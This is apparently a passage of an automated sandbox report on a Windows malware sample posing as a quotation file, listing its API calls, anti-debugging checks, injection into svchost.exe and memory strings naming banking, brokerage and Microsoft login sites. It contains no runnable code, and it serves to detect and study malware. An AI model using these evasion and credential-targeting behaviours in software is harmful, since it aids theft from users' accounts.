            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BBC2C0 FindFirstFileW,FindNextFileW,FindClose,4_2_02BBC2C0
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 01194HH4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: 01194HH4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: 01194HH4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: 01194HH4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: 01194HH4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: 01194HH4.4.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: 01194HH4.4.drBinary or memory string: global block list test formVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: 01194HH4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: 01194HH4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: netbtugc.exe, 00000004.00000002.3759956328.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000002.3763967525.00000000010DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 01194HH4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: firefox.exe, 00000008.00000002.1913214248.0000028F5E85C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
            Source: 01194HH4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: 01194HH4.4.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: 01194HH4.4.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: 01194HH4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: 01194HH4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: 01194HH4.4.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: 01194HH4.4.drBinary or memory string: discord.comVMware20,11696503903f
            Source: 01194HH4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeAPI call chain: ExitProcess graph end nodegraph_0-86743
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172B3 LdrLoadDll,2_2_004172B3
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0406D0A0 mov eax, dword ptr fs:[00000030h]0_2_0406D0A0
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0406D100 mov eax, dword ptr fs:[00000030h]0_2_0406D100
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0406BAB0 mov eax, dword ptr fs:[00000030h]0_2_0406BAB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
